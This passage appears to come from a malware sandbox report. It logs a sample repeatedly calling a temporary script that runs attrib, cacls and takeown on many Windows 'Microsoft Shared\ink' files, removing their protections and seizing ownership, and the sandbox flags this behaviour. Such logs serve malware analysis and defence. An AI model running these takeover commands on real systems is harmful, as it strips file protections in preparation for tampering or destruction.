    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml""
  2⤵
  PID:388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml""
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml" /E /G Admin:F /C
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml""
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml"
    3⤵
    - Views/modifies file attributes
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml"
    3⤵
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml"
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml"
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml"
    3⤵
    PID:676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml"
    3⤵
    - Modifies file permissions
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml"
    3⤵
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml" /E /G Admin:F /C
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml"
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml"
    3⤵
    - Views/modifies file attributes
    PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml"
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml" /E /G Admin:F /C
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml"
    3⤵
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml"
    3⤵
    - Modifies file permissions
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml""
  2⤵
  PID:904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml"
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml"
    3⤵
    - Modifies file permissions
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml"
    3⤵
    - Views/modifies file attributes
    PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml"
    3⤵
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml""
  2⤵
  PID:744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml"
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml"
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml"
    3⤵
    - Views/modifies file attributes
    PID:1860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml"
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml""
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml"
    3⤵
    - Views/modifies file attributes
    PID:1768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml"
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml""
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml"
    3⤵
    - Modifies file permissions
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml""
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml" /E /G Admin:F /C
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml"
    3⤵
    - Modifies file permissions
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml""
  2⤵
  PID:760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml"
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml"
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml" /E /G Admin:F /C
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui""
  2⤵
  PID:240
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui"
    3⤵
    - Drops file in Program Files directory
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui"
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui"
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat""
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat" /E /G Admin:F /C
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat"
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat" /E /G Admin:F /C
    3⤵
    PID:368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat"
    3⤵
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat"
    3⤵
    PID:388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat"
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat" /E /G Admin:F /C
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat"
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat""
  2⤵
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat""
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat"
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat" /E /G Admin:F /C
    3⤵
    PID:472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat"
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml""
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml"
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml" /E /G Admin:F /C
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml"
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml"
    3⤵
    PID:1876
